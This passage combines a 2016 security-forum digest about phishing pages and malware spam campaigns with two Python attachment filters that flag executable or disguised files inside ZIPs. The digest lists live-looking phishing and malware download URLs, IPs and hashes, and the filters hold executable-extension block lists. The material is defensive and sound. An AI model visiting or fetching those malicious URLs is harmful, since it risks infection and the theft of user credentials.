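EXECUTABLE_EXTENSIONS = {
    ".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
    ".ps1", ".bat", ".cmd", ".scr", ".pif", ".exe",
}
MAX_NESTING = 3  # how many zip-in-zip layers to open before giving up


def build_zip(members: dict) -> bytes:
    """Constructed attachment: {member name: bytes} -> ZIP bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def executable_members(zip_bytes: bytes, depth: int = 0) -> list:
    """Paths of every member that would execute if double-clicked.

    Raises zipfile.BadZipFile for data that is not a ZIP archive."""
    found = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            ext = posixpath.splitext(name)[1].lower()   # "Photo.jpg.js" -> ".js"
            if ext == ".zip" and depth < MAX_NESTING:
                for inner in executable_members(zf.read(info), depth + 1):
                    found.append(f"{name}!{inner}")
            elif ext in EXECUTABLE_EXTENSIONS:
                found.append(name)
    return found


def should_reject(zip_bytes: bytes) -> bool:
    """Mail-filter decision: reject on any executable member or an unreadable archive."""
    try:
        return bool(executable_members(zip_bytes))
    except zipfile.BadZipFile:
        return True   # cannot inspect it, so do not let it through


# Constructed samples modelled on the posts.
FEDEX_ZIP = build_zip({"FedEx_track_98404283928/FedEx_track_98404283928.js": b"// downloader"})
PHOTO_ZIP = build_zip({"docment_380578378.js": b"// downloader"})
NESTED_ZIP = build_zip({"Scan001.zip": build_zip({"scan0001.jpg.js": b"// double extension"})})
BENIGN_ZIP = build_zip({"report.pdf": b"%PDF-1.4 ...", "notes.txt": b"hello"})

if __name__ == "__main__":
    for label, blob in [("FedEx", FEDEX_ZIP), ("Photo", PHOTO_ZIP),
                        ("Nested", NESTED_ZIP), ("Benign", BENIGN_ZIP)]:
        print(label, should_reject(blob), executable_members(blob))
```

Rejecting archives that cannot be parsed is deliberate: a filter that only inspects what it can open is trivially bypassed by a deliberately malformed header that the recipient's unzip tool will still tolerate. Password-protected ZIPs fall into the same bucket, since their member names are visible but their contents are not.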
'Credit/Debit Card temporarily disabled' – PHISH
FYI...
'Credit/Debit Card temporarily disabled' – PHISH
- https://myonlinesecurity.co.uk/we-ha...card-phishing/
18 June 2016 - "There are a few major common subjects in a phishing attempt. Lots of them are either PayPal, your Bank or your Credit Card, with a message saying something like:
Urgent: Your card has been stopped !
There have been unauthorised or suspicious attempts to log in to your account, please verify
Your account has exceeded its limit and needs to be verified
Your account will be suspended !
You have received a secure message from < your bank>
We are unable to verify your account information
Update Personal Information
Urgent Account Review Notification
We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address
Confirmation of Order
We have temporarily disabled your Credit/Debit Card
The original email looks like this. It will NEVER be a genuine email from PayPal, your Bank or credit card so don’t ever follow the links or fill in the html (webpage) form that comes attached to the email. Note the bad spelling of norepply and the VLSA .COM that is supposed to say visa .com (using lookalike domains is a common trick that phishers use). The English grammar in the email is just not quite right, so suggesting that this was created by somebody that doesn’t have English as their primary language...
Screenshot: https://myonlinesecurity.co.uk/wp-co...d-1024x700.png
This particular phishing campaign starts with an email-with-a-link. The link in this case goes to http ://adistancia.favaloro .edu.ar/themes/landingPage.html where you are invited to enter the case ID from the email:
> https://myonlinesecurity.co.uk/wp-co...1-1024x811.png
Without the ID number, you just get an error message:
> https://myonlinesecurity.co.uk/wp-co...a_phish_1a.png
If you enter the correct ID you get:
> https://myonlinesecurity.co.uk/wp-co...2-1024x760.png
... Which is a typical phishing page that looks very similar to a genuine visa page, if you don’t look carefully at the URL in the browser address bar. This one wants your personal details, Your SSN (US Social Security Number), your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details..."
adistancia.favaloro .edu.ar: 190.12.101.227: https://www.virustotal.com/en/ip-add...7/information/
>> https://www.virustotal.com/en/url/15...1c78/analysis/
:fear::fear: :mad:
'Apple ID' Phish, Fake 'Swift Pmnt Notice', Dropbox, 'VAT Return'SPAM, JS ransomware
FYI...
Fake 'Apple ID' SPAM / Phish
- https://myonlinesecurity.co.uk/your-...sons-phishing/
20 June 2016 - "... Apple phishing attempt... 300 copies in the last couple of hours. The subject is one we see regularly 'Your Apple ID has been disabled for security reasons!'... several copies where all the body content is in the subject line & nothing in the body:
From: Apple <apples@ applestuffs .com>
Date: Mon 20/06/2016 11:12
Subject: Your Apple ID has been disabled for security reasons!
Attachment: None
Screenshot: https://myonlinesecurity.co.uk/wp-co...s-1024x693.png
The link behind the verify now goes to http ://interwurlitzer .com/write/it.html which -redirects- to http ://flyingstart .ca/science/disabled/apple/index.php neither of which look even vaguely like any Apple site so shouldn’t fool anybody... some careless users will click through, not look at the URL in the browser and give all their details:
> https://myonlinesecurity.co.uk/wp-co...h-1024x596.png
If you are careless enough or unwise enough to enter your apple ID & password, you get to this page where they ask for all the personal & financial information:
> https://myonlinesecurity.co.uk/wp-co...b-754x1024.png
... Watch for any site that invites you to enter -ANY- personal or financial information. It might be an email that says 'you have won a prize' or 'sign up to this website for discounts, prizes and special offers'..."
interwurlitzer .com: 87.229.45.133: https://www.virustotal.com/en/ip-add...3/information/
>> https://www.virustotal.com/en/url/25...7f5b/analysis/
flyingstart .ca: 67.212.91.221: https://www.virustotal.com/en/ip-add...1/information/
>> https://www.virustotal.com/en/url/1d...da44/analysis/
___
Fake 'Swift Payment Notice' SPAM - malicious link
- https://isc.sans.edu/diary.html?storyid=21177
2016-06-20 - "Some of our readers reported spam messages related to the recent Swift case. With all the buzz around this story, it looks legitimate to see more and more attackers using this scenario to entice victims to open malicious files. The mail subject is "Swift Payment Notice, pls check" and contains an image of a receipt embedded in an HTML page... The HTML-link-points to a malicious PE file called "SWIFT COPY.exe" (MD5: 6ccabab506ad6a8f13c6d84b955c3037). The file is downloaded from a compromised WordPress instance and seems to contain a keylogger. Data are sent to onyeoma5050s .ddns .net. The host resolved to 95.140.125.110 but it is not valid anymore (take down already completed?). Even if PE files should be blocked by most web proxies, the current VT score remains low (6/55*) which still makes it dangerous."
* https://www.virustotal.com/en/file/3...d794/analysis/
___
Fake Dropbox SPAM - js malware
- https://myonlinesecurity.co.uk/andre...u-scan001-zip/
20 June 2016 - "... an email with the subject of 'Andrew Lumley sent you Scan001.zip' pretending to come from Andrew Lumley via Dropbox <no-reply@ dropbox .com> with a link to a zip file containing 3 identical JavaScript files...
Screenshot: https://myonlinesecurity.co.uk/wp-co...p-1024x715.png
20 June 2016: scan001.zip: Extracts to: scan0001.js - Current VirusTotal detections 3/56*
.. Payload Security** shows a download from 69.20.55.160 :80/Scripts/rex7.exe (VirusTotal 3/56[3])
(Payload Security[4])... This is another one of the files that unless you have “show known file extensions” enabled, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c...is/1466428353/
** https://www.reverse.it/sample/ccf1eb...ironmentId=100
Contacted Hosts
69.20.55.160
3] https://www.virustotal.com/en/file/0...is/1466428353/
4] https://www.reverse.it/sample/06397e...ironmentId=100
69.20.55.160: https://www.virustotal.com/en/ip-add...0/information/
>> https://www.virustotal.com/en/url/4e...b8f5/analysis/
___
Fake 'VAT Return' SPAM - macro malware
- https://myonlinesecurity.co.uk/vat-r...ds-ransomware/
20 June 2016 - "... an email with the subject of 'VAT Return' pretending to come from noreply@ hmrc .gov.uk with a malicious word doc attachment is another one from the current bot runs...
Screenshot: https://myonlinesecurity.co.uk/wp-co...n-1024x450.png
20 June 2016: vat030116-0530161.doc - Current VirusTotal detections 4/55*.
.. Payload Security[2] shows it downloads http ://xbdev .net/hmrc.zip (VirusTotal 4/56**)... it is Sharik which is a password stealer... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/a...is/1466424536/
2] https://www.reverse.it/sample/a7ac9f...ironmentId=100
** https://www.virustotal.com/en/file/2...is/1466429914/
xbdev .net: 208.97.176.242: https://www.virustotal.com/en/ip-add...2/information/
>> https://www.virustotal.com/en/url/21...86f8/analysis/
___
Fake 'PO' SPAM - Java malware attachment
- https://myonlinesecurity.co.uk/order...-java-malware/
20 June 2016 - "An email pretending to be an order for scarves with the subject of 'Re: PO' pretending to come from Martina O’Shea <Martinashea@ maf .ae> with a Java jar attachment... One of the emails looks like:
From: Martina O’Shea <Martinashea@ maf .ae>
Date: Mon 20/06/2016 11:46
Subject: Re: PO
Attachment: 23456445.jar
Good morning
Please find attached an order for some scarves
for delivery to our warehouse in Churchfield,
Cork.
Please confirm all scarves are available and a
delivery date for same.
Many thanks.
Kind regards,
Manager – Buying Administration Dept
The Kilkenny Group ...
20 June 2016: 23456445.jar - Current VirusTotal detections 15/56*
I don’t have Java installed and none of the online analysers ever tell us anything really useful about Java files but MALWR** does show several files being dropped or downloaded... This is another one of the files that unless you have “show known file extensions” enabled, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/6...is/1466389366/
** https://malwr.com/analysis/NjQ0ZmUwM...RlYWYwZjU4MzI/
___
JavaScript ransomware
- http://www.trendmicro.com.au/vinfo/a...fect-computers
June 16, 2016 - "... ransomware called RAA is composed entirely of JavaScript and has been spreading via email attachments that pretend to be doc files with names like mgJaXnwanxlS_doc_.js. Once the JavaScript is opened, it will encrypt files in the affected machine and demand a ransom amounting roughly to US$250 to get the files. Reportedly, RAA infections display the ransom note in Russian, however, it’s only a matter of time until it’s distributed more widely and localized for other languages. Additionally, the ransomware also infects the victim’s computer by installing Pony, a well-known password-stealing malware embedded in the JavaScript file. This malware can collect browser passwords and other user information from an infected machine, and is usually used by hackers to gather critical information on infected systems. Pony is similar to banking trojans, but its behavior was not manifested in RAA. The RAA ransomware is considered unique because it’s rare to see client-side malware written in web-based languages like JavaScript, which are primarily designed to be interpreted by browsers. Microsoft has previously warned* about a spike in malicious email attachments containing JavaScript files in April 2016. The following month, security researchers alerted about spam emails that deliver and distribute the Locky ransomware via .js attachments. Both Locky and RAA use JavaScript files as malware downloaders — designed to download and install a traditional malware program. With RAA however, the entire ransomware is written in JavaScript..."
* https://blogs.technet.microsoft.com/...to-avoid-them/
"... The spam email contains a .zip or .rar file attachment which carries a malicious JavaScript..."
> http://www.bleepingcomputer.com/news...ng-javascript/
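Several of the lures above rely on a script or executable whose name reads like a document (scan0001.js inside Scan001.zip, the 23456445.jar "order", mgJaXnwanxlS_doc_.js for RAA). The following mail-gateway style check is an added example, not code from the original post or the sites quoted; the extension lists, the "invoice.pdf.js" name and the in-memory zip are constructed for the demo.

```python
"""Flag attachments whose names mimic documents but are really scripts/executables.
Added example; lists and sample names are constructed, not taken from the campaigns."""
import io
import re
import zipfile

# Extensions Windows executes directly and hides when "hide extensions for known
# file types" is on. Constructed list; extend to fit the gateway policy.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "js", "jse", "vbs", "vbe",
                   "wsf", "wsh", "hta", "jar", "bat", "cmd", "ps1"}
# Tokens a victim expects to see on an ordinary document or image attachment.
DOCUMENT_TOKENS = {"doc", "docx", "pdf", "jpg", "jpeg", "png", "xls", "xlsx", "txt"}

def classify_attachment(name: str) -> list[str]:
    """Return the reasons a file name looks dangerous (empty list = nothing found).
    Note: a macro .doc such as the 'VAT Return' lure is NOT caught by name alone."""
    reasons = []
    lower = name.lower()
    parts = lower.split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    if ext in EXECUTABLE_EXTS:
        reasons.append(f"executable extension .{ext}")
        # A document-like token anywhere before the real extension
        # (invoice.pdf.js, mgJaXnwanxlS_doc_.js) is a masquerade attempt.
        stem = ".".join(parts[:-1])
        tokens = set(re.split(r"[._\-\s]+", stem))
        hit = tokens & DOCUMENT_TOKENS
        if hit:
            reasons.append(f"masquerades as {sorted(hit)[0]}")
    if "\u202e" in name:  # right-to-left override reverses the visible extension
        reasons.append("RTLO character in name")
    return reasons

def inspect_zip(data: bytes) -> dict[str, list[str]]:
    """Map every member of a zip attachment to its risk reasons, without extracting."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {m: classify_attachment(m) for m in zf.namelist()}

def build_sample_zip() -> bytes:
    """Constructed stand-in for the 'Scan001.zip' lure: only placeholder content."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for n in ("scan0001.js", "invoice.pdf.js", "mgJaXnwanxlS_doc_.js"):
            zf.writestr(n, "// constructed placeholder, not a real script\n")
    return buf.getvalue()

if __name__ == "__main__":
    for member, reasons in inspect_zip(build_sample_zip()).items():
        print(member, "->", reasons or "ok")
```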